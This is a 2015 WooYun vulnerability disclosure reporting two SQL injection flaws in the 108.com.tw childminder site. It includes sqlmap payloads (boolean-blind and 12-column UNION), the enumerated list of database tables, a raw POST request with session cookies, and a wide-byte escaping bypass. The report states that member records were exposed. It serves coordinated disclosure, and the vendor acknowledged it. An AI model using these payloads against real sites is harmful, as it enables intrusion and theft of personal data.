当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129107

漏洞标题:108保姆银行主站两个SQL注入打包(支持UNION)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-07-25 14:37

修复时间:2015-09-10 18:24

公开时间:2015-09-10 18:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

详细说明:

0x01
http://www.108.com.tw/main04/108news/news_detail.php?Id=155

1.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=155 AND 1743=1743
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: Id=-4946 UNION ALL SELECT NULL,CONCAT(0x71766a7871,0x4d6d4352664552787947,0x7170786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: com108_site
[46 tables]
+-------------------------------+
| restrict |
| admins |
| area |
| areacode |
| banner |
| banner1 |
| banner2 |
| banner3 |
| carerestrict |
| childminder |
| company |
| county |
| doctor_suggest |
| epaper |
| expert |
| job |
| ladychild |
| languagespeak |
| maillist_group |
| maillist_queue |
| member_restrict |
| memberchildminderno |
| memberno |
| members |
| members_childminder |
| members_childminder_appraisal |
| members_childminder_edu |
| members_childminder_exp |
| members_childminder_expert |
| members_childminder_homepage |
| members_childminder_job_exp |
| members_childminder_jobnow |
| members_childminder_photo |
| message_childminder |
| message_form_for_childminder |
| message_form_for_parent |
| message_members |
| messages_108_childminder |
| messages_108_members |
| news |
| news2 |
| news3 |
| parent_case |
| service |
| suggestion |
| visitor |
+-------------------------------+


0x02

POST /main04/members/members_childminder_add.php HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
Referer: http://www.108.com.tw:80/
Cookie: PHPSESSID=768821f907f29944e7d0d258c4c29b5c; admin_spiderpass=32cc5886dc1fa8c106a02056292c4654
Host: www.108.com.tw
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
act=add&identificationcard=1&passwd=g00dPa%24%24w0rD&passwd_comfirm=g00dPa%24%24w0rD

identificationcard 参数

脚本名:unmagicquotes.py  作用:宽字符绕过 GPC addslashes
Input: 1′ AND 1=1
Output: 1%bf%27 AND 1=1–%20


漏洞证明:

大量会员信息

2.png


11.png

12.png

不深入了~

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-27 18:22

厂商回复:

感謝通知!

最新状态:

暂无